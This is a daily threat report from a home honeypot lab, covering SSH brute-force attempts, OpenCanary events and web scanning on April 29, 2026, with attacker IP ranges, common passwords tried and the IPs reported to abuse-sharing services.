Honeypot Threat Analysis — April 29, 2026
Critical severity continues — 2,064 SSH connections with 359 commands. Galah web scanning resumes with 76 requests.
Threat Landscape Overview
Critical severity for the second consecutive day: 2,064 SSH connections (81 IPs), 662 OpenCanary events (17 IPs), and 76 Galah web requests (37 IPs). While OpenCanary volume dropped significantly from yesterday’s 7,919, SSH activity remained aggressively elevated with 2,906 login attempts.
SSH Brute Force Analysis
2,906 login attempts from 81 IPs with 359 post-auth commands — attackers are actively exploiting the honeypot shell at scale. The 2,906-to-2,064 ratio (1.4 logins per connection) indicates efficient, multi-credential attacks.
Password dictionary: 123456, admin, 123, password, 1234. Top attacker 45.156.87.254 operated from the same bulletproof hosting range as yesterday’s 45.156.87.99. 176.65.132.17 is another variant from the persistent 176.65.x.x scanning network.
Post-auth commands included system fingerprinting (uname variants), shell testing (echo SHELL_TEST), process enumeration, and mount point scanning — the standard automated reconnaissance playbook.
Web Scanner Activity
Galah resumed operations with 76 requests from 37 IPs. Key paths: /sitemap.xml, /zc?action=getInfo, /login. The /login path being targeted indicates scanners are looking for authentication endpoints to brute force.
Notable Trends
The 45.156.87.x range has been active across multiple days with different final octets (.99, .254), suggesting a dedicated scanning operation rotating through a subnet allocation. The 176.65.x.x range shows similar rotation patterns. These are not individual attackers but organized scanning infrastructure.
Community Defense
17 IPs reported to AbuseIPDB. All data shared with AlienVault OTX, Blocklist.de, and SANS DShield.
This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.